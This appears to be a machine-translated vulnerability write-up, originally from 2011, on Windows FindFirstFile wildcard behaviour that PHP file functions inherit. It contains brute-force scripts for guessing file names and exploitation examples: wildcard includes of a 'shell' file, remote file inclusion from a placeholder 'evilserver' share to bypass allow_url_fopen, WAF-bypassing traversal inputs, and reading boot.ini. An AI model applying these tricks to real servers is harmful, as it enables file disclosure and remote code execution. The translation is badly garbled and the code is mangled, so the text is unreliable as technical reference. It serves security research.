Analysis of PHP path blasting problem caused by Windows file system mechanism _php instance

1. Opening remarks

This disclosure is a test result of the questions raised on the following pages:
Http://code.google.com/p/pasc2at/wiki/SimplifiedChinese

<?phpfor ($i =0; $i <255; $i + +) {$url = ' 1.ph '. chr ($i); $tmp = @file_get_contents ($url); if (!empty ($tmp)) echo Chr ($i ) . "\ r \ n";}? >

Known 1.php exists, the result of the above script access is:

1.php1.php1.ph<1.ph>

can be returned.
The first two return results are always known (because the Windows file system supports the size of the inter-turn mechanism), and the other two returns have caught our attention.
Test PHP Version: php4.9,php5.2,php5.3,php6.0
Test system: WINXP SP3 x32,winxp SP2 x64,win7,win2k3
After testing, we concluded that the vulnerability affected all windows+php versions

2. Explore the results of the blur test

To continue digging deeper into the information about the bug, we made a few changes to the demo:

<?phpfor ($j =0; $i <256; $j + +) {for ($i =0; $i <256; $i + +) {$url = ' 1.p '. chr ($j). chr ($i); $tmp = @file_get_conten TS ($url), if (!empty ($tmp)) echo chr ($j). Chr ($i). "\ r \ n";}? >

In the process of debugging the PHP interpreter, we attribute this "magical" vulnerability to the result of a WINAPI function FindFirstFile () (http://msdn.microsoft.com/en-us/library/aa364418 (v =vs.85). aspx). What's even better is that when we trace the function call stack we find that the character ">" is replaced with "?", the character "<" is replaced by "*", and the symbol "(double quotation mark) is replaced with a". " Character. This is mentioned in the 2007 MSDN Public documentation: HTTP://MSDN.MICROSOFT.COM/EN-US/LIBRARY/COMMUNITY/HISTORY/AA364418%28V=VS.85%29.ASPX?ID=3
However, this bug has not been repaired by any version released by Windows!
What we want to make clear is that the function FindFirstFile () under PHP is far from file_get_contents (). About the functions that the bug can take advantage of we have listed the following table:

In addition, we have found that the use can also be applied to C + +, following the example from MSDN:

#include 
 
  
   
  #include 
  
   
    
   #include 
   
    
     
    void _tmain (int argc, TCHAR *argv[]) {Win32_find_ DATA Findfiledata; HANDLE hfind;if (argc! = 2) {_tprintf (TEXT ("Usage:%s [target_file]\n"), argv[0]); return;} _tprintf (TEXT ("Target file is%s\n"), argv[1]), hfind = FindFirstFile (argv[1], &findfiledata); if (hfind = = Invalid_ha Ndle_value) {printf ("FindFirstFile failed (%d) \ n", GetLastError ()); return;} else{_tprintf (TEXT ("The first file found is%s\n"), findfiledata.cfilename); FindClose (Hfind);}}
   
    
  
   
 
  

When the parameter "c:\bo<" is passed in, access to the boot. ini file is successful.

3. Summary of utilization methods

When the FindFirstFile () function is called, "<" is replaced with "*", which means that the rule allows "<" to replace more than one arbitrary character, but the test finds that not all cases are as we wish. Therefore, in order to ensure that the "<" is replaced with "*", the "<<" should be used
Example:include (' shell< '); or include (' shell<< '); When there is more than one file in the folder that begins with the shell, it executes the first file that is sorted by the alphabetical table.
When calling the FindFirstFile () function, ">" is replaced with "?", which means that ">" can replace a single arbitrary character
Example:include (' shell.p>p '); When more than one file is shell.p?p, the execution takes the first file after sorting alphabetically.
When the FindFirstFile () function is called, "" "(double quotation marks) is replaced with". "
Example:include (' Shell ' php '); ===>include (' shell.php ');
If the first character of a file name is "." , you can ignore it when you read it.
Example:fopen ('. htacess '); ==>fopen (' htacess '); Plus the use of the 1th ==>fopen (' h<< ');
The end of the file name can be combined with a series of/or \, you can also add the. character to the/or \ Center, just make sure the last one is "."
Example:fopen ("config.ini\\.//\/\/\/."); ==> fopen (' config.ini\./.\. '); ==>fopen (' config.ini/////. ') ==>fopen (' Config.ini ... ')//Translator Note: The use here is not very understanding, what is the role? Truncated?
This function can also call a network share file that starts with "\ \", which is of course a short time consuming. To add, if the share name does not exist, the file operation will take an additional 4 seconds and may trigger a time response mechanism and a max_execution_time throw error. Fortunately, the use can be used to bypass Allow_url_fopen=off and eventually lead to an RFI (remote file contains)
Example:include (' \\evilserver\shell.php ');
You can also switch the name of a file by using the following method
Include (' \\.\c:\my\file.php\. \.. \.. \d:\anotherfile.php ');
Select disk naming syntax can be used to bypass slash character filtering
file_get_contents (' C:boot.ini '); ==> file_get_contents (' C:/boot.ini ');
In the command-line environment of PHP (Php.exe), the details of the utilization of the system's reserved name files
Example:file_get_contents (' c:/tmp/con.jpg '); This will endlessly read 0 bytes from the con device until it encounters EOF
Example:file_put_contents (' C:/tmp/con.jpg ', Chr (0x07)); This will continue to make the server beep-like sound

4. A more in-depth approach to use

In addition to the methods shown above, you can use the following posture to bypass WAF or file name filtering
Consider this example:

<?phpfile_get_contents ("/images/". $_get[' a ']. ". JPG ");//or another function from Table 1, i.e. include ().? >

Access test.php?a=. /a<%00
There may be two kinds of results

Warning:include (/images/. /a<) [function.include]: Failed to open stream:invalid argument in ... Warning:include (/images/. /a<) [function.include]: failed to open stream:permission denied.

In the first case, there is no file with a heading, and the second one exists.

In addition, there are records that sometimes the site throws the following error:

Warning:include (/ADMIN_H1D3) [function.include]: failed to open stream:permission denied.

This means that there is more than one file (clip) in the folder, and the first one is admin_h1d3.

5. Conclusion
The experiment tells us that PHP itself does not have so many loopholes, and what we see is that it relies too much on another programming language (note: A bug in the text that is produced from the WINAPI), and is directly enforced, will result in minor errors (bugs) and, ultimately, damage (Vul). This broadens the scope of the fuzzy test (the translator notes: Not only to study the web level, but to the bottom of the system), and eventually lead to the ids,ips of the rules update. Admittedly, the code needs to be protected, patches need to be patched and needs to be upgraded and expanded. However, this is not really the issue we have to pay attention to. In the present, I think we are more cautious about writing more stringent filtering rules, just as we have been doing. Heavy responsibilities, excellence.
Because this is a fundamental application layer problem, we suspect that similar problems may occur in other Web applications. We also tested the MYSQL5, and the experimental results showed that there was no such loophole in MYSQL5. But we still think that a similar loophole would appear in explanatory languages such as Perl, Python, and Ruby.

6.Referer

PHP Application source code audits Advanced TECHNOLOGY:HTTP://CODE.GOOGLE.COM/P/PASC2AT/WIKI/SIMPLIFIEDCHINESEMSDN FindFirstFile Function reference:http://msdn.microsoft.com/en-us/library/aa364418 (v=vs.85). AspxMSDN comments history:http://msdn.microsoft.com/en-us/library/community/history/aa364418 (v=vs.85). Aspx?id=3MSDN article« Naming Files, Paths, and namespaces»:http://msdn.microsoft.com/en-us/library/aa365247 (v=vs.85). Aspxtechnet article« Managing Files and Directories»:http://technet.microsoft.com/en-us/library/cc722482.aspxpaper«technique of quick Exploitation of 2blind SQL injection»:http://www.exploit-db.com/papers/13696/

==================================================================
Complete the full text.
Note: This article is a white paper published at the end of 2011, and the bug still exists today. I did a cuit a few months ago when I ran into a CTF, the use of the bug, it was to see this article, was just a rough rough time, wrote a PHP script to run the directory. There is nothing to do this time, translation finishing A.

